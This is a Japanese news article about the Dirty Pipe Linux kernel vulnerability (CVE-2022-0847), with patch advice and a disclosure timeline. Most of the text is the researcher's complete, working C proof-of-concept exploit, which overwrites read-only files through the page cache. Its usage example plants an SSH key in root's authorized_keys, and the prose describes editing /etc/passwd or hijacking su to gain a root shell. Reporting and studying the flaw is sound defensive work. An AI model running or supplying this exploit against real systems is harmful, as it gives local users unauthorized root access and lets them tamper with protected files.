CM4allのセキュリティ研究者であるMaxKellermannは、Linuxカーネルに重大度の高い特権昇格の脆弱性があることを明らかにしました:DirtyPipe。脆弱性番号はCVE-2022-0847です。
報告によると、この脆弱性はバージョン5.8以降に存在しています。root以外のユーザーは、読み取り専用ファイルにデータを挿入して上書きすることにより、 root権限を取得します。特権のないプロセスがルートプロセスにコードを挿入する可能性があるためです。
マックス氏によると、「ダーティパイプ」の脆弱性は数年前の「ダーティカウ」に似ているため、名前は似ていますが、前者の方が悪用されやすいとのことです。さらに、この脆弱性はハッカーによって悪用されており、研究者はできるだけ早くバージョンをアップグレードすることを推奨しています。Linux5.16.11、5.15.25、および5.10.102はすべてこの脆弱性を修正しています。
Maxは、記事でエクスプロイトPoCを提供しました。
/* SPDX-License-Identifier: GPL-2.0 */
/*
* Copyright 2022 CM4all GmbH / IONOS SE
*
* author: Max Kellermann <[email protected]>
*
* Proof-of-concept exploit for the Dirty Pipe
* vulnerability (CVE-2022-0847) caused by an uninitialized
* "pipe_buffer.flags" variable. It demonstrates how to overwrite any
* file contents in the page cache, even if the file is not permitted
* to be written, immutable or on a read-only mount.
*
* This exploit requires Linux 5.8 or later; the code path was made
* reachable by commit f6dd975583bd ("pipe: merge
* anon_pipe_buf*_ops"). The commit did not introduce the bug, it was
* there before, it just provided an easy way to exploit it.
*
* There are two major limitations of this exploit: the offset cannot
* be on a page boundary (it needs to write one byte before the offset
* to add a reference to this page to the pipe), and the write cannot
* cross a page boundary.
*
* Example: ./write_anything /root/.ssh/authorized_keys 1 $'\nssh-ed25519 AAA......\n'
*
* Further explanation: https://dirtypipe.cm4all.com/
*/
#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/user.h>
#ifndef PAGE_SIZE
#define PAGE_SIZE 4096
#endif
/**
* Create a pipe where all "bufs" on the pipe_inode_info ring have the
* PIPE_BUF_FLAG_CAN_MERGE flag set.
*/
static void prepare_pipe(int p[2])
{
if (pipe(p)) abort();
const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);
static char buffer[4096];
/* fill the pipe completely; each pipe_buffer will now have
the PIPE_BUF_FLAG_CAN_MERGE flag */
for (unsigned r = pipe_size; r > 0;) {
unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
write(p[1], buffer, n);
r -= n;
}
/* drain the pipe, freeing all pipe_buffer instances (but
leaving the flags initialized) */
for (unsigned r = pipe_size; r > 0;) {
unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
read(p[0], buffer, n);
r -= n;
}
/* the pipe is now empty, and if somebody adds a new
pipe_buffer without initializing its "flags", the buffer
will be mergeable */
}
int main(int argc, char **argv)
{
if (argc != 4) {
fprintf(stderr, "Usage: %s TARGETFILE OFFSET DATA\n", argv[0]);
return EXIT_FAILURE;
}
/* dumb command-line argument parser */
const char *const path = argv[1];
loff_t offset = strtoul(argv[2], NULL, 0);
const char *const data = argv[3];
const size_t data_size = strlen(data);
if (offset % PAGE_SIZE == 0) {
fprintf(stderr, "Sorry, cannot start writing at a page boundary\n");
return EXIT_FAILURE;
}
const loff_t next_page = (offset | (PAGE_SIZE - 1)) + 1;
const loff_t end_offset = offset + (loff_t)data_size;
if (end_offset > next_page) {
fprintf(stderr, "Sorry, cannot write across a page boundary\n");
return EXIT_FAILURE;
}
/* open the input file and validate the specified offset */
const int fd = open(path, O_RDONLY); // yes, read-only! :-)
if (fd < 0) {
perror("open failed");
return EXIT_FAILURE;
}
struct stat st;
if (fstat(fd, &st)) {
perror("stat failed");
return EXIT_FAILURE;
}
if (offset > st.st_size) {
fprintf(stderr, "Offset is not inside the file\n");
return EXIT_FAILURE;
}
if (end_offset > st.st_size) {
fprintf(stderr, "Sorry, cannot enlarge the file\n");
return EXIT_FAILURE;
}
/* create the pipe with all flags initialized with
PIPE_BUF_FLAG_CAN_MERGE */
int p[2];
prepare_pipe(p);
/* splice one byte from before the specified offset into the
pipe; this will add a reference to the page cache, but
since copy_page_to_iter_pipe() does not initialize the
"flags", PIPE_BUF_FLAG_CAN_MERGE is still set */
--offset;
ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
if (nbytes < 0) {
perror("splice failed");
return EXIT_FAILURE;
}
if (nbytes == 0) {
fprintf(stderr, "short splice\n");
return EXIT_FAILURE;
}
/* the following write will not create a new pipe_buffer, but
will instead write into the page cache, because of the
PIPE_BUF_FLAG_CAN_MERGE flag */
nbytes = write(p[1], data, data_size);
if (nbytes < 0) {
perror("write failed");
return EXIT_FAILURE;
}
if ((size_t)nbytes < data_size) {
fprintf(stderr, "short write\n");
return EXIT_FAILURE;
}
printf("It worked!\n");
return EXIT_SUCCESS;
}レポートによると、ローカルユーザーは自分のデータを機密性の高い読み取り専用ファイルに挿入したり、制限を解除したり、構成を変更してより高い特権を取得したりできます。一部の研究者は、この脆弱性を使用して/ etc / passwdファイルを変更しました。変更後、rootユーザーのパスワードを直接キャンセルして、通常のユーザーがsurootコマンドを使用してrootアカウントにアクセスできます。他の研究者は、/ usr / bin/suコマンドを使用して/tmp/ shのルートシェルを削除することで、ルート権限を取得する方が簡単であることを発見しました。
最後に、使用しているLinuxサーバーのカーネルバージョンを確認することをお勧めします。バージョンが5.8を超えている場合は、できるだけ早くアップグレードしてください。
Dirty Pipeの脆弱性のタイムライン:
- 2022-02-20: バグレポート、エクスプロイト、パッチをLinuxカーネルセキュリティチームに送信する
- 2022-02-21:Google Pixel 6でバグを再現し、Androidセキュリティチームにバグレポートを送信する
- 2022-02-21:Linus Torvalds、Willy Tarreau、Al Viroが提案したように、パッチをLKMLに送信します(脆弱性の詳細なし)
- 2022-02-23:バグ修正を含むLinux安定バージョンをリリース (5.16.11、5.15.25、5.10.102)
- 2022-02-24:Googleはバグ修正をAndroidカーネルにマージします
- 2022-02-28: linux- distros メーリングリストに通知する
- 2022-03-07:公開